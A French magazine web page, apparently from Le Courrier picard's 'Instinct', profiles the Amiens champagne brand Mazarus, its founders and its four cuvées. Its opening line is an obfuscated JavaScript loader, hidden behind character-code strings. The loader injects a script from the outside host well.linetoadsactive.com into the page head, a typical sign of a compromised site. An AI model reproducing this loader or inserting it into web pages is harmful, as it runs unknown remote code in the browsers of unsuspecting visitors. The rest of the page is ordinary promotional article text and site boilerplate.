Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Inspirés par le Cardinal Mazarin et son goût des belles choses, les champagnes Mazarus proposent 4 cuvées uniques dont chaque bouteille est ornée d’un cristal Swarovski. A déguster avec modération mais aussi délectation.

    Mazarus

    Tous deux Amiénois, Mickaël Debrie et Gauthier Testu se rencontrent sur les bancs de l’ISEG à Lille. Très vite, ils se découvrent une passion commune pour le champagne et l’entreprenariat. De retour sur leur terre natale, ils s’associent et créent Mazarus, un champagne dont les bouteilles sont ornées de cristaux Swarovski. Au fil de leur aventure, Mickaël Debrie et Gauthier Testu décident de se concentrer davantage sur les bulles. C’est ainsi que naît la première cuvée Mazarus.

    Mickaël Debrie et Gauthier Testu © Mazarus

    La cuvée Héritage est un champagne festif, doux, qui accompagne parfaitement les apéritifs et les desserts »

    explique Gauthier Testu.

     

    Mazarus
    Mazarus

    Puis vient la cuvée Grande Réserve, un blanc de blancs 100% chardonnay un poil plus fruité. Distribué chez des restaurateurs et des cavistes du Grand Nord, Mazarus se fait une place dans le monde feutré du champagne. Galvanisés par les retours positifs, Mickaël Debrie et Gauthier Testu décident de partir à la recherche d’un nouveau producteur, porteur de la prestigieuse appellation Grand Cru. Ils trouvent une oreille attentive chez un professionnel installé à Chouilly. « La cuvée Cardinal est plus complexe, plus boisée, elle offre plus de caractère lors de la dégustation » souligne Gauthier Testu pas peu fier de ce blanc de blancs 100% Chardonnay lui aussi.Enfin, pour compléter leur gamme, les Amiénois ont imaginé « Marquise », un champagne rosé alliant Chardonnay et Pinot Noir. « Aujourd’hui nous produisons 6 000 bouteilles par an. Nous avons une vue artisanale du métier, ce qui nous permet d’être très exigeants et d’avoir une qualité constante » ajoute Mickaël Debrie qui ambitionne de monter à 10 000 bouteilles par an.

    Un développement raisonnable qui permettrait à Mazarus d’accroître sa notoriété et de conquérir de nouveaux territoires sans jamais trahir ses valeurs.

    • L’abus d’alcool est dangereux pour la santé, consommez avec modération.

    Par D.L. P.

    Commentez ou exprimez-vous grâce aux emojis !
    0
    J'AIMEJ'AIME
    0
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !
    • LE MAGAZINE URBAIN DU COURRIER PICARD Le Courrier picard, quotidien régional leader en Picardie, souhaitait répondre à un besoin grandissant des lecteurs : un magazine chic et tendance. C’est ainsi qu’est né «Instinct», un magazine harmonieux qui réunit 3 univers : la mode, la décoration et la culture.

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    L’art industriel passionnément

    Rodolphe Gosset aime travailler l’acier et le bois. Il propose des meubles de style ...

    Louis Aguilar, le caméléon

    Avant d’être Musicien, Louis Aguilar, l’un des artistes qui montera sur la scène du ...

    Découvrez notre dossier lingerie pour la Saint-Valentin

    Chantal Thomass, le boudoir des délices Dentelles sexy, lingerie rose et noire, jeux d’éventails…La ...

    Une Saint-Valentin au menu aphrodisiaque

    Pour ceux qui pensent que la Saint-Valentin est aussi un moment de gourmandise partagée, ...

    Chez Jules, l’histoire d’une odyssée familiale

    La Brasserie Jules c’est l’histoire d’une réussite professionnelle mais aussi familiale. Un récit qui ...

    Fifty Fifty : le goût du vintage

    Fabien Caumont passe plus de temps sur les routes à dénicher des trésors que ...